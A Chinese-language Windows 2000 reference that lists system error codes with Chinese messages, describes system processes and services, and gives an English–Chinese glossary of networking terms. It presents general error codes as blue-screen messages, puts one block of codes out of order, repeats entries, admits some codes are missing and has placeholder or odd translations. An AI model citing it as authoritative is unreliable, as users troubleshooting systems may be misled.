2202 0x089A 指定的使用者名称无效。
2250 0x08CA 网络联机不存在。
2401 0x0961 这个网络联机已经开启档案或者要求暂停。
2402 0x0962 现行的联机仍然存在。
2404 0x0964 装置正在使用中,无法中断联机。
3000 0x0BB8 指定的打印机监视器不详。
3001 0x0BB9 指定的打印机驱动程序正在使用中。
3002 0x0BBA 找不到排存盘。
3003 0x0BBB 没有发出 StartDocPrinter 呼叫。
3004 0x0BBC 没有发出 AddJob 呼叫。
3005 0x0BBD 指定的打印处理器已经安装。
3006 0x0BBE 指定打印监控程序已经安装。
4000 0x0FA0 在处理指令时,WINS 发生错误。
4001 0x0FA1 无法删除区域的 WINS。
4002 0x0FA2 The importation from the file failed. 4003 0x0FA3 制作备份失败。以前执行过完整的备份吗 ?
4004 0x0FA4 无法制作备份,请检查目录。
4005 0x0FA5 名称不在 WINS 数据库中。
4006 0x0FA6 不可用未设定的打印机来取代。
6118 0x17E6 这个工作群组的服务清单目前无法使用。
在很多电脑用户来说,Windows蓝屏是一个很严重的问题。它可能是系统崩溃的前兆,也可以是系统已经崩溃的现象。但很多时候,这样的蓝屏问题并非没有解决的方法,但前提是我们了解蓝屏时,系统提示的信息,下面我们为大家一一列出Windows 2000的蓝屏提示信息解析。
0 0x0000 作业完成。
1 0x0001 不正确的函数。
2 0x0002 系统找不到指定的档案。
3 0x0003 系统找不到指定的路径。
4 0x0004 系统无法开启档案。
5 0x0005 拒绝存取。
6 0x0006 无效的代码。
7 0x0007 储存体控制区块已毁。
8 0x0008 储存体空间不足,无法处理这个指令。
9 0x0009 储存体控制区块地址无效。
10 0x000A 环境不正确。
11 0x000B 尝试加载一个格式错误的程序。
12 0x000C 存取码错误。
13 0x000D 资料错误。
14 0x000E 储存体空间不够,无法完成这项作业。
15 0x000F 系统找不到指定的磁盘驱动器。
16 0x0010 无法移除目录。
16 0x0010 无法移除目录。
17 0x0011 系统无法将档案移到 其它的磁盘驱动器。
18 0x0012 没有任何档案。
19 0x0013 储存媒体为写保护状态。
20 0x0014 系统找不到指定的装置。
21 0x0015 装置尚未就绪。
22 0x0016 装置无法识别指令。
23 0x0017 资料错误 (cyclic redundancy check)
24 0x0018 程序发出一个长度错误的指令。
25 0x0019 磁盘驱动器在磁盘找不到 持定的扇区或磁道。
26 0x001A 指定的磁盘或磁盘无法存取。
27 0x001B 磁盘驱动器找不到要求的扇区。
28 0x001C 打印机没有纸。
29 0x001D 系统无法将资料写入指定的磁盘驱动器。
30 0x001E 系统无法读取指定的装置。
31 0x001F 连接到系统的某个装置没有作用。
32 0x0020 The process cannot access the file because it is being used by another process.
33 0x0021 档案的一部份被锁定, 现在无法存取。
34 0x0022 磁盘驱动器的磁盘不正确。 请将 %2 (Volume Serial Number: %3) 插入磁盘机%1。
36 0x0024 开启的分享档案数量太多。
38 0x0026 到达档案结尾。
39 0x0027 磁盘已满。
50 0x0032 不支持这种网络要求。
51 0x0033 远程计算机无法使用。
52 0x0034 网络名称重复。
53 0x0035 网络路径找不到。
54 0x0036 网络忙碌中。
55 0x0037 The specified network resource or device is no longer available.
56 0x0038 The network BIOS command limit has been reached. 57 0x0039 网络配接卡发生问题。
58 0x003A 指定的服务器无法执行要求的作业。
59 0x003B 网络发生意外错误。
60 0x003C 远程配接卡不兼容。
61 0x003D 打印机队列已满。
62 0x003E 服务器的空间无法储存等候打印的档案。
63 0x003F 等候打印的档案已经删除。
64 0x0040 指定的网络名称无法使用。
65 0x0041 拒绝存取网络。
65 0x0041 拒绝存取网络。
66 0x0042 网络资源类型错误。
67 0x0043 网络名称找不到。
68 0x0044 超过区域计算机网络配接卡的名称限制。
69 0x0045 超过网络 BIOS 作业阶段的限制。
70 0x0046 远程服务器已经暂停或者正在起始中。
71 0x0047 由于联机数目已达上限,此时无法再联机到这台远程计算机。
72 0x0048 指定的打印机或磁盘装置已经暂停作用。
80 0x0050 档案已经存在。
82 0x0052 无法建立目录或档案。
83 0x0053 INT 24 失败
84 0x0054 处理这项要求的储存体无法使用。
85 0x0055 近端装置名称已经在使用中。
86 0x0056 指定的网络密码错误。
87 0x0057 参数错误。
88 0x0058 网络发生资料写入错误。
89 0x0059 此时系统无法执行其它行程。
100 0x0064 无法建立其它的系统 semaphore。
注:由于资料丢失,暂时没法找到90—99的信息提示
101 0x0065 属于其它行程专用的 semaphore.
102 0x0066 semaphore 已经设定,而且无法关闭。
103 0x0067 无法指定 semaphore 。
104 0x0068 在岔断时间无法要求专用的 semaphore 。
104 0x0068 在岔断时间无法要求专用的 semaphore 。
105 0x0069 此 semaphore 先前的拥有权已经结束。
106 0x006A 请将磁盘插入 %1。
107 0x006B 因为代用的磁盘尚未插入,所以程序已经停止。
108 0x006C 磁盘正在使用中或被锁定。
109 0x006D Pipe 已经中止。
110 0x006E 系统无法开启指定的 装置或档案。
111 0x006F 档名太长。
112 0x0070 磁盘空间不足。
113 0x0071 没有可用的内部档案标识符。
114 0x0072 目标内部档案标识符不正确。
117 0x0075 由应用程序所执行的 IOCTL 呼叫 不正确。
118 0x0076 写入验证参数值不正确。
119 0x0077 系统不支持所要求的指令。
120 0x0078 此项功能仅在 Win32 模式有效。
121 0x0079 semaphore 超过逾时期间。
122 0x007A 传到系统呼叫的资料区域 太小。
123 0x007B 文件名、目录名称或储存体卷标语法错误。
124 0x007C 系统呼叫层次不正确。
125 0x007D 磁盘没有设定卷标。
126 0x007E 找不到指定的模块。
127 0x007F 找不到指定的程序。
128 0x0080 没有子行程可供等待。
128 0x0080 没有子行程可供等待。
129 0x0081 %1 这个应用程序无法在 Win32 模式下执行。
130 0x0082 Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O.
131 0x0083 尝试将档案指针移至档案开头之前。
132 0x0084 无法在指定的装置或档案,设定档案指针。
133 0x0085 JOIN 或 SUBST 指令 无法用于 内含事先结合过的磁盘驱动器。
134 0x0086 尝试在已经结合的磁盘驱动器,使用 JOIN 或 SUBST 指令。
135 0x0087 尝试在已经替换的磁盘驱动器,使 用 JOIN 或 SUBST 指令。
136 0x0088 系统尝试删除 未连结过的磁盘驱动器的连结关系。
137 0x0089 系统尝试删除 未替换过的磁盘驱动器的替换关系。
138 0x008A 系统尝试将磁盘驱动器结合到已经结合过之磁盘驱动器的目录。
139 0x008B 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。
140 0x008C 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。
141 0x008D 系统尝试将磁盘驱动器 SUBST 成已结合的磁盘驱动器 目录。
142 0x008E 系统此刻无法执行 JOIN 或 SUBST。
143 0x008F 系统无法将磁盘驱动器结合或替换同一磁盘驱动器下目录。
144 0x0090 这个目录不是根目录的子目录。
145 0x0091 目录仍有资料。
146 0x0092 指定的路径已经被替换过。
147 0x0093 资源不足,无法处理这项 指令。
148 0x0094 指定的路径这时候无法使用。
148 0x0094 指定的路径这时候无法使用。
149 0x0095 尝试要结合或替换的磁盘驱动器目录,是已经替换过的的目标。
150 0x0096 CONFIG.SYS 文件未指定系统追踪信息,或是追踪功能被取消。
151 0x0097 指定的 semaphore事件 DosMuxSemWait 数目不正确。
152 0x0098 DosMuxSemWait 没有执行;设定太多的 semaphore。
153 0x0099 DosMuxSemWait 清单不正确。
154 0x009A 您所输入的储存媒体标 元长度限制。
155 0x009B 无法建立其它的执行绪。
156 0x009C 接收行程拒绝接受信号。
157 0x009D 区段已经被舍弃,无法被锁定。
158 0x009E 区段已经解除锁定。
159 0x009F 执行绪识别码的地址不正确。
160 0x00A0 传到 DosExecPgm 的自变量字符串不正确。
161 0x00A1 指定的路径不正确。
162 0x00A2 信号等候处理。
164 0x00A4 系统无法建立执行绪。
167 0x00A7 无法锁定档案的部份范围。
170 0x00AA 所要求的资源正在使用中。
173 0x00AD 取消范围的锁定要求不明显。
174 0x00AE 档案系统不支持自动变更锁定类型。
180 0x00B4 系统发现不正确的区段号码。
182 0x00B6 操作系统无法执行 %1。
182 0x00B6 操作系统无法执行 %1。
183 0x00B7 档案已存在,无法建立同一档案。
186 0x00BA 传送的旗号错误。
187 0x00BB 指定的系统旗号找不到。
188 0x00BC 操作系统无法执行 %1。
189 0x00BD 操作系统无法执行 %1。
190 0x00BE 操作系统无法执行 %1。
191 0x00BF 无法在 Win32 模式下执行 %1。
192 0x00C0 操作系统无法执行 %1。
193 0x00C1 %1 不是正确的 Win32 应用程序。
194 0x00C2 操作系统无法执行 %1。
195 0x00C3 操作系统无法执行 %1。
196 0x00C4 操作系统无法执行 这个应用程序。
197 0x00C5 操作系统目前无法执行 这个应用程序。
198 0x00C6 操作系统无法执行 %1。
199 0x00C7 操作系统无法执行 这个应用程序。
最基本的系统进程(也就是说,这些进程是系统运行的基本条件,有了这些进程,系统就能正常运行)
smss.exe Session Manager
csrss.exe 子系统服务器进程
winlogon.exe 管理用户登录
services.exe 包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。(系统服务) 产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务) ->netlogon
svchost.exe 包含很多系统服务 !!!->eventsystem,
(SPOOLSV.EXE 将文件加载到内存中以便迟后打印。)
explorer.exe 资源管理器
(internat.exe 托盘区的拼音图标)
==================================================================== 附加的系统进程(这些进程不是必要的,你可以根据需要通过服务管理器来增加或减少)
mstask.exe 允许程序在指定时间运行。(系统服务)->schedule
regsvc.exe 允许远程注册表操作。(系统服务)->remoteregister
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exe->msftpsvc,w3svc,iisadmn
tlntsvr.exe->tlnrsvr
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。远程安装服务的一部分。(系统服务)
termsrv.exe ->termservice
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。(系统服务)
=================================================================
以下全是系统服务,并且很少会用到,如果你暂时用不着,应该关掉(对安全有害 )
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。(系统服务)->simptcp
支持以下 TCP/IP 服务:Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。(系统服务)
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。(系统服务)
ups.exe 管理连接到计算机的不间断电源(UPS)。(系统服务)
wins.exe 为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。(系统服务)
llssrv.exe License Logging Service(system service)
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。(系统服务)
RsSub.exe 控制用来远程储存数据的媒体。(系统服务)
locator.exe 管理 RPC 名称服务数据库.->rpclocator(区 RpcSs)
lserver.exe 注册客户端许可证。(系统服务)
dfssvc.exe 管理分布于局域网或广域网的逻辑卷。(系统服务)
clipsrv.exe 支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。(系统服务)
msdtc.exe 并列事务,是分布于两个以上的数据库,消息队列,文件系统,或其它事务保护资源管理器。(系统服务)
faxsvc.exe 帮助您发送和接收传真。(系统服务)
cisvc.exe Indexing Service(system service)!!!
dmadmin.exe 磁盘管理请求的系统管理服务。(系统服务)
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。(系统服务)
netdde.exe 提供动态数据交换 (DDE) 的网络传输和安全特性。(系统服务)
smlogsvc.exe 配置性能日志和警报。(系统服务)
rsvp.exe 为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功能。(系统服务)
RsEng.exe 协调用来储存不常用数据的服务和管理工具。(系统服务)
RsFsa.exe 管理远程储存的文件的操作。(系统服务)
grovel.exe 扫描零备份存储(SIS)卷上的重复文件,并且将重复文件指向一个数据存储点,以节省磁盘空间。(系统服务)
SCardSvr.exe 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统服务)
snmp.exe 包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系统服务)
snmptrap.exe 接收由本地或远程 SNMP 代理程序产生的陷阱消息,然后将消息传递到运行在这台计算机上 SNMP 管理程序。(系统服务)
UtilMan.exe 从一个窗口中启动和配置辅助工具。(系统服务)
msiexec.exe 依据 .MSI 文件中包含的命令来安装、修复以及删除软件。(系统服务)
A
A (address) resource record --- A(地址)资源记录
AAL, ATM adaptation layer --- ATM 适配层
ABR, area border router --- 区域边界路由器
ABR, available bit rate --- 可用的传输率
access control --- 访问控制
access control entry, ACE --- 访问控制项
access number --- 访问号码
access permission --- 访问权限
access privileges --- 访问特权
account lockout --- 帐户锁定
ACE, access control entry --- 访问控制项
ACK, acknowledgment --- 确认
acknowledgment message --- 确认信息
ACPI, Advanced Configuration and Power Interface --- 高级配置和电源接口
active --- 活动
active content --- 活动内容
Active Directory
Active Directory data model --- Active Directory 数据模型
Active Directory Service Interfaces --- Active Directory 服务接口
Active Directory Users and Computers --- Active Directory 用户和计算机
active partition --- 活动分区
active volume --- 活动卷
ActiveX
ActiveX control --- ActiveX 控件
adapter card --- 适配器卡
address classes --- 地址类别
address pool --- 地址池
Address Resolution Protocol, ARP --- 地址解析协议
adjacency --- 邻近
administration queue --- 管理队列
administrative alerts --- 管理警报
administrator --- 管理员
Advanced Configuration and Power Interface, ACPI --- 高级配置和电源接口
affinity --- 相似性
agent --- 代理
Alerter service --- 报警器服务
allocation unit size --- 分配单位大小
Alpha computer --- Alpha 计算机
American Standard Code for Information Interchange, ASCII --- 美国信息交换标准码
APIPA, Automatic Private IP Addressing --- 自动专用 IP 寻址
AppleShare
AppleTalk
AppleTalk Filing Protocol --- AppleTalk 编档协议
AppleTalk network integration (formerly Services for Macintosh) --- AppleTalk 网络集成(以前的 Macintosh 服务)
AppleTalk Phase 2
AppleTalk Protocol --- AppleTalk 协议
AppleTalk Transport --- AppleTalk 传输
application --- 应用程序
application assignment --- 应用程序指派
area border router, ABR --- 区域边界路由器
ARP, Address Resolution Protocol --- 地址解析协议
AS, autonomous system --- 自治区系统
ASBR, autonomous system boundary router --- 自治区系统边界路由器
ASCII, American Standard Code for Information Interchange --- 美国信息交换标准码
Assistive Technology Program --- 辅助技术程序
asymmetric encryption --- 非对称加密
asynchronous communication --- 异步通讯
ATM, asynchronous transfer mode --- 异步传输模式
ATM adaptation layer --- ATM 适配层(AAL)
attribute --- 属性
audit logging --- 审核记录
audit policy --- 审核策略
auditing --- 审核
authentication --- 身份验证
authoritative --- 授权
authoritative restore --- 强制性还原
authorization --- 授权
auto-static routes --- 自动静态路由
auto-static updates --- 自动静态更新
Automatic Private IP Addressing, APIPA --- 自动专用 IP 寻址
autonomous system, AS --- 自治区系统
autonomous system boundary router, ASBR --- 自治区系统边界路由器
availability --- 可用性
available bit rate, ABR --- 可用的传输率
AXFR, full zone transfer --- 完整区域传送
B
B-channel --- B 信道
B-ISDN, broadband integrated services digital network --- 广播综合业务数字网络
backbone router --- 主干路由器
background program --- 后台程序
backup domain controller, BDC --- 备份域控制器
backup media pool --- 备份媒体池
backup operator --- 备份操作员
backup set --- 备份集
backup set catalog --- 备份集类别
backup types --- 备份类型
bandwidth --- 带宽
Bandwidth Allocation Protocol, BAP --- 带宽分配协议
BAP, Bandwidth Allocation Protocol --- 带宽分配协议
base priority --- 基本优先级
basic disk --- 基本磁盘
basic input/output system, BIOS --- 基本输入/输出系统
basic storage --- 基本存储
basic volume --- 基本卷
batch program --- 批处理程序
baud rate --- 波特率
BDC, backup domain controller --- 备份域控制器
Berkeley Internet Name Domain, BIND --- Berkeley Internet 名称域
BGP, Border Gateway Protocol --- 边界网关协议
binary --- 二进制
binary digit (bit) --- 二进制数字(位)
BIND, Berkeley Internet Name Domain --- Berkeley Internet 名称域
BIND boot file --- BIND 启动文件
bindery --- 平构数据库
binding --- 绑定
BINL (Boot Information Negotiation Layer) Service --- BINL(启动信息协商层)服务
BIOS, basic input/output system --- 基本输入/输出系统
bit (binary digit) --- 位(二进制数字)
bits per second, bps --- 每秒位数
boot --- 启动
boot disk --- 启动盘
boot files --- 启动文件
Boot Information Negotiation Layer (BINL) Service --- 启动信息协商层 (BINL) 服务
Boot Logging --- 启动记录
boot partition --- 启动分区
boot volume --- 启动卷
BOOTP, bootstrap protocol --- BOOTP 协议
BOOTP extensions --- BOOTP 扩展
BOOTP Relay Agent --- BOOTP 延迟代理
bootstrap protocol, BOOTP --- 自陷协议
Border Gateway Protocol, BGP --- 边界网关协议
bps, bits per second --- 每秒位数
broadband integrated services digital network, B-ISDN --- 宽带综合业务数字网
broadcast and unknown server, BUS --- 广播和未知服务器
broadcast message --- 广播消息
broadcast network --- 广播网络
buffer --- 缓冲区
built-in groups --- 内置组
bus --- 总线
BUS, broadcast and unknown server --- 广播和未知服务器
bytes received --- 接收的字节数
bytes transmitted --- 传输的字节数
C
CA, certification authority --- 证书颁发机构
cache --- 高速缓存
cache file --- 缓存文件
caching --- 缓存
caching resolver --- 缓存解析程序
Callback Control Protocol, CBCP --- 回叫控制协议
callback number --- 回叫号码
callback security --- 回叫安全
called subscriber ID (CSID) string --- 被呼叫的订阅者 ID 字符串
canonical (CNAME) resource record --- 规范的 (CNAME) 资源记录
canonical name --- 规范名称
CAPI, CryptoAPI
capture --- 捕获
capture password --- 捕获密码
capture trigger --- 捕获触发器
cartridge font --- 字库盒字体
catalog --- 分类
CBCP, Callback Control Protocol --- 回叫控制协议
CBR, constant bit rate --- 恒定传输率
CCITT, Consultative Committee on Telephony and Telegraphy --- 电话和电报咨询委员会
CCP, Compression Control Protocol --- 压缩控制协议
CDFS, Compact Disc File System --- 光盘文件系统
CDP, CRL Distribution Point --- CRL 分发点
certificate --- 证书
certificate revocation list, CRL --- 证书吊销列表
Certificate Services --- 证书服务
certificate store --- 证书存储区
certificate template --- 证书模板
certificate trust list, CTL --- 证书信任列表
certification authority, CA --- 证书颁发机构
certification hierarchy --- 证书结构
certification path --- 证书路径
Challenge Handshake Authentication Protocol, CHAP --- 质询握手验证协议
channel --- 信道
CHAP, Challenge Handshake Authentication Protocol --- 质询握手验证协议
character mode --- 字符模式
child domain --- 子域
child object --- 子对象
Chooser --- 选取器
Chooser Pack --- 选取器包
circuit switching --- 电路交换
Class A IP address --- A 类 IP 地址
Class B IP address --- B 类 IP 地址
Class C IP address --- C 类 IP 地址
classical IP over ATM, CLIP --- 通过 ATM 的典型 IP
clear --- 清除
clear-text passwords --- 明文密码
client --- 客户端
client application --- 客户端应用程序
client request --- 客户请求
Client Service for NetWare --- NetWare 客户服务
CLIP, classical IP over ATM --- 通过 ATM 的典型 IP
ClipBook Server --- 剪贴簿服务器
cluster --- 群集
cluster adapter --- 群集适配器
Cluster Administrator --- 群集管理器
Cluster Administrator extension --- 群集管理器扩展
Cluster API --- 群集 API
cluster log --- 群集日志
Cluster service --- 群集服务
cluster size --- 簇大小
cluster storage --- 群集存储
cluster-aware application --- 支持群集的应用程序
cluster-unaware application --- 不支持群集的应用程序
Cluster.exe
CNAME (canonical) resource record --- CNAME(规范的)资源记录
CMYK color space --- CMYK 色彩空间
code page --- 代码页
codec --- 编解码器color gamut --- 色阶
color management --- 色彩管理
color profile --- 颜色配置文件
color space --- 彩色空间
COM Internet Services Proxy --- COM Internet 服务代理
Command Prompt window /“命令提示符”窗口
common groups --- 公用组
communication port --- 通讯端口
communication settings --- 通讯设置
community name --- 社团名
Compact Disc File System, CDFS --- 光盘文件系统
Compression Control Protocol, CCP --- 压缩控制协议
computer account --- 计算机帐户
Computer Browser service --- 计算机浏览器服务
computer quota --- 计算机配额
computer-telephony integration, CTI --- 计算机电话集成
conflict detection --- 冲突检测
connect --- 连接
connected user --- 已连接的用户
connected, authenticating user --- 已连接,正在验证用户
connected, user authenticated --- 已连接,已验证用户
connection-oriented --- 面向连接的
connectionless --- 无连接的
connector application --- 连接器应用程序
connector queue --- 连接器队列
console tree --- 控制台树
constant bit rate, CBR --- 恒定传输率
Consultative Committee on Telephony and Telegraphy, CCITT --- 电话和电报技术咨询委员会
container object --- 容器对象
convergence --- 会合
copy backup --- 复制备份
count to infinity --- 计数到无穷大
CPU Time --- CPU 时间
CPU Usage --- CPU 使用率
CRC errors --- CRC 错误
CRL, certificate revocation list --- 证书吊销列表
CRL Distribution Point, CDP --- CRL 分发点
cross-reference object --- 交叉引用对象
CryptoAPI (CAPI)
cryptographic service provider, CSP --- 加密服务提供程序
cryptography --- 加密
CSID (Called Subscriber ID) String --- CSID(被叫订户 ID)字符串
CSP, cryptographic service provider --- 加密服务提供程序
CTI, computer-telephony integration --- 计算机电话集成
CTL, certificate trust list --- 证书信任列表
custom file type --- 自定义文件类型
D
D-channel --- D 信道
DACL, discretionary access control list --- 自由访问控制列表
daily backup --- 每日备份
Data Communications Equipment, DCE --- 数据通讯设备
data fork --- 数据派生
DLC, Data Link Control --- 数据链接控制
Data Terminal Equipment, DTE --- 数据终端设备
data-overrun error --- 数据溢出错误
DCE, Data Communications Equipment --- 数据通讯设备
DDE, dynamic data exchange --- 动态数据交换
dead-letter queue --- 死信队列
debugger --- 调试程序
dedicated adapter --- 专用适配器
default button --- 默认按钮
default host --- 默认主机
default network --- 默认网络
default printer --- 默认打印机
default tree and context --- 默认树和上下文
default user --- 默认用户
default zone --- 默认区域
defragmentation --- 碎片整理
delegation --- 委派
demand-dial connection/ 请求拨号连接
demand-dial routing --- 请求拨号路由选择
dependency --- 依存
dependency tree --- 依存树
dependent client --- 依存客户
descendent key --- 派生项
desired zone --- 所需区域
desktop --- 桌面
desktop pattern --- 桌面方案
destination document --- 目标文档
details pane --- 详细信息窗格
device . 设备
device conflict --- 设备冲突
device driver --- 设备驱动程序
device fonts --- 设备字体
Device Manager --- 设备管理器
DFS link --- DFS 链接
DFS path --- DFS 路径
DFS replication --- DFS 复制
DFS root --- DFS 根
DFS topology --- DFS 拓扑
DHCP acknowledgment message, DHCPACK --- DHCP 确认消息
DHCP class identifier --- DHCP 类标识符
DHCP client --- DHCP 客户
DHCP decline message, DHCPDECLINE --- DHCP 拒绝消息
DHCP information message, DHCPINFORM --- DHCP 信息消息
DHCP negative acknowledgment message, DHCPNAK --- DHCP 反确认消息
DHCP offer message, DHCPOFFER --- DHCP 提供消息
DHCP option --- DHCP 选项
DHCP relay agent --- DHCP 中继代理
DHCP release message, DHCPRELEASE --- DHCP 释放消息
DHCP request message, DHCPREQUEST --- DHCP 请求消息
DHCP server --- DHCP 服务器
DHCP Service resource --- DHCP 服务资源
DHCPACKDHCP, acknowledgment message --- 确认消息
DHCPDECLINE, DHCP decline message --- DHCP 拒绝消息
DHCPINFORM, DHCP information message --- DHCP 信息消息
DHCPNAK, DHCP negative acknowledgment message --- DHCP 反确认消息
DHCPOFFER, DHCP offer message --- DHCP 提供消息
DHCPRELEASE, DHCP release message --- DHCP 释放消息
DHCPREQUEST, DHCP request message --- DHCP 请求消息
dial location --- 拨号位置
dial-up connection --- 拨号连接
dial-up line --- 拨号线路
differential backup --- 差异备份
digital signature --- 数字签名
Digital Signature Standardm, DSS --- 数字签名标准
digital subscriber line, DSL --- 数字订户线路
digital video disc, DVD --- 数字视频光盘
direct cable connection --- 直接电缆连接
direct hosting --- 直接宿主
direct memory access, DMA --- 直接内存访问
directory --- 目录
directory database --- 目录数据库
directory partition --- 目录分区
directory replication --- 目录复制
Directory Service --- 目录服务
disable --- 禁用
discovery --- 发现
discretionary access control list, DACL --- 任意访问控制列表
disk --- 磁盘
disk configuration information --- 磁盘配置信息
disk mirroring --- 磁盘镜像
dismount --- 卸除
display adapter --- 显示适配器
display password --- 显示密码
distinguished name --- 可分辨的名称
Distributed Transaction Coordinator resource --- 分布式事务协调器资源
distribution group --- 分配组
DLC, Data Link Control --- 数据链接控件
DLL, dynamic-link library --- 动态链接库
DMA, direct memory access --- 直接内存访问
DNS
DNS dynamic update protocol --- DNS 动态更新协议
DNS name servers --- DNS 命名服务器
docking station --- 插接站
document --- 文档
domain --- 域
domain controller --- 域控制器
domain DFS --- 域 DFS
domain local group --- 域本地组
domain model --- 域模型
domain name --- 域名
domain namespace --- 域名称空间
domain naming master --- 域命名主机
domain of origin --- 原始域
domain suffix --- 域后缀
domain tree --- 域目录树
dots per inch, DPI --- 每英寸点数
downcasing --- 小写转换
downloadable fonts --- 可下载字体
DPI, dots per inch --- 每英寸点数
drag --- 拖动
drain --- 损耗
drainstop --- 损耗停止
drive --- 驱动器
drive letter --- 驱动器号
drop folder --- 放入文件夹
DSL, digital subscriber line --- 数字订户线路
DSS, Digital Signature Standard --- 数字签名标准
DTE, Data Terminal Equipment --- 数据终端设备
dual boot --- 双重启动
duplex --- 双工
DVD decoder --- DVD 解码器
DVD, digital video disc --- 数字视频光盘
DVD drive --- DVD 驱动器
DWORD
dynamic data exchange, DDE --- 动态数据交换
dynamic disk --- 动态磁盘
DHCP
dynamic routing --- 动态路由
dynamic storage --- 动态存储
dynamic volume --- 动态卷
dynamic-link library, DLL --- 动态链接库
E
EAP, Extensible Authentication Protocol --- 可扩展身份验证协议
EFS, encrypting file system --- 加密文件系统
ELAN, emulated local area network --- 仿真局域网
embedded object --- 内嵌对象
emergency repair disk, ERD --- 紧急修复磁盘
emulated local area network, ELAN --- 仿真局域网
enable --- 启用
encapsulated PostScript (EPS) file --- EPS 文件
encapsulation --- 封装
encrypted password --- 加密密码
encrypting file system, EFS --- 加密文件系统
encryption --- 加密
enhanced small device interface, ESDI --- 增强小型设备接口
environment variable --- 环境变量
EPS (encapsulated PostScript) file --- EPS 文件
ERD, emergency repair disk --- 紧急修复磁盘
error detection --- 错误检测
ESDI, enhanced small device interface --- 增强小型设备接口
event --- 事件
Event Log service --- 事件日志服务
event logging --- 事件记录
everyone category --- everyone 类别
exclusion range --- 排除范围
exclusive OR, XOR --- 异或
expanded memory/ 扩充内存
expansion slot --- 扩充插槽
expire interval --- 过期间隔
explicit permissions --- 直接权限
express message --- 表达消息
extended memory --- 扩展内存
extended partition --- 扩展分区
Extensible Authentication Protocol, EAP --- 可扩展身份验证协议
extension-type association --- 扩展名类型关联
external network number --- 外部网络号
F
failback --- 故障回复
failback policy --- 故障回复策略
failed --- 失败
failover --- 故障转移
failover policy --- 故障转移策略
failover time --- 故障转移时间
FAT, file allocation table --- 文件分配表
FAT32
fault tolerance --- 容错
Fax Service --- 传真服务
FCB, file control block --- 文件控制块
Federal Information Processing Standard 140-1, FIPS 140-1 --- 联邦信息处理标准 140-1
FEP, front-end processor --- 前端处理器
file allocation table, FAT --- 文件分配表
File and Print Services for NetWare --- NetWare 文件和打印服务
file control block, FCB --- 文件控制块
file creator --- 文件编写者
file fork --- 文件派生
file replication service --- 文件复制服务
File Services for Macintosh --- Macintosh 文件服务
File Share resource --- 文件共享资源
file system --- 文件系统
File Transfer Protocol, FTP --- 文件传输协议
file type --- 文件类型
filter --- 筛选器
filtering mode --- 筛选模式
FIPS 140-1, Federal Information Processing Standard 140-1 --- 联邦信息处理标准 140-1
firewall --- 防火墙
firmware --- 固件
font --- 字体
font cartridge --- 字体盒
foreground program --- 前台程序
foreign computer --- 异种计算机
forest --- 树林
form --- 表单
FORTEZZA
forward lookup --- 正向搜索
forwarder --- 转发程序
FQDN, fully qualified domain name --- 完全合格域名
fragmentation --- 碎片整理
frame --- 帧
frame type --- 帧类型
free media pool --- 可用媒体池
free space --- 可用空间
front-end processor, FEP --- 前端处理器
FTP, File Transfer Protocol --- 文件传输协议
full-duplex --- 全双工
full name --- 全名
full zone transfer, AXFR --- 完整区域传送
fully qualified domain name, FQDN --- 完全合格域名
G
gateway --- 网关
gateway account --- 网关帐户
Gateway Service for NetWare --- NetWare 网关服务
GDI objects --- GDI 对象
Generic Application resource --- 一般应用程序资源
Generic Service resource --- 一般服务资源
global account --- 全局帐户
global catalog --- 全局编录
global group --- 全局组
glue chasing --- 粘贴跟踪
glue records --- 粘贴记录
graphics mode --- 图形模式
gratuitous ARP --- ** ARP
group --- 组
group account --- 组帐户
group memberships --- 组成员身份
group name --- 组名
Group Policy --- 组策略
Group Policy object --- 组策略对象
guest --- 来宾
guest account --- 来宾帐户
H
H.323
half-duplex --- 半双工
handle count --- 句柄数
handshaking --- 握手
Hardware Compatibility List, HCL --- 硬件兼容性列表
hardware compression --- 硬件压缩
hardware configuration --- 硬件配置
hardware decoder --- 硬件解码器
hardware profile --- 硬件配置文件
hardware type --- 硬件类型
hash --- 散列
hash algorithm --- 散列算法
Hash-based Message Authentication Code, HMAC --- 基于散列的消息验证代码
HCL, Hardware Compatibility List --- 硬件兼容性列表
header error control, HEC --- 报头错误控制
heartbeat --- 信跳
HEC, header error control --- 报头错误控制
heterogeneous environment --- 异构环境
hexadecimal --- 十六进制
high availability --- 高可用性
histogram --- 直方图
hive --- 配置单元
HMAC, Hash-based Message Authentication Code --- 基于散列的消息验证代码
home directory --- 宿主目录
host --- 主机
host ID --- 主机 ID
host name --- 主机名
horeplication --- DFS 级
Hosts file --- Hosts 文件
HTML, Hypertext Markup Language --- 超文本标记语言
hub --- 集线器
hubbed mode --- 集中模式
hue --- 色调
Hypertext Markup Language, HTML --- 超文本标记语言
I
I/O (input/output) port --- 输入/输出端口
IAS, Internet Authentication Service --- Internet 验证服务
ICMP, Internet Control Message Protocol --- 网际消息控制协议
IDE, integrated device electronics --- 集成设备电路
IEEE 1394
IETF, Internet Engineering Task Force --- Internet 工程任务组
IGMP, Internet Group Management Protocol --- Internet 组管理协议
IIS, Internet Information Services --- Internet 信息服务
IIS Server Instance resource --- IIS 服务器实例资源
ILMI, integrated local management interface --- 集成本地管理接口
Image Name --- 图像名
IME, Input Method Editor --- 输入法
impersonation --- 模拟
import media pool --- 导入媒体池
in-addr.arpa domain --- in-addr.arpa 域
incremental backup --- 增量备份
incremental zone transfer, IXFR --- 增量区域传送
independent client --- 独立客户
Indexing Service --- 索引服务
.inf
infrared, IR --- 红外
Infrared Data Association, IrDA --- 红外数据联盟
